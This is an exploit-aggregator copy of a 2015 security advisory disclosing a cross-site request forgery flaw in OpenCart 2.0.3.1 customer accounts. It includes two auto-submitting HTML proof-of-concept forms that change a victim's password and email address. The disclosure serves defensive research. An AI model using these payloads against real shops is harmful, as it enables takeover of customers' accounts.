Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2015110055

Below is a copy:

OpenCart 2.0.3.1 Cross Site Request ForgerySecurity Advisory - Curesec Research Team

1. Introduction

Affected Product:    OpenCart 2.0.3.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      https://www.opencart.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist for
customers. This means that customer accounts can be compromised by an attacker
if the victim visits an attacker controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions of
OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password" >
    <input type="hidden" name="password" value="12345">
    <input type="hidden" name="confirm" value="12345">
</form>
<script>document.myform.submit();</script>

Change profile information, including email address, which is used when logging
in:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit" >
    <input type="hidden" name="currency" value="USD">
    <input type="hidden" name="language" value="en">
    <input type="hidden" name="firstname" value="Jane">
    <input type="hidden" name="lastname" value="Smith">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="telephone" value="1234567">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/   Informed Vendor about Issue (no reply)
2015
09/22/   Reminded Vendor of disclosure date
2015
09/23/   Vendor points out that issue is already known, and that they do not
2015     plan on releasing a fix
10/07/   Disclosed to public
2015


Blog Reference:
http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html



Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.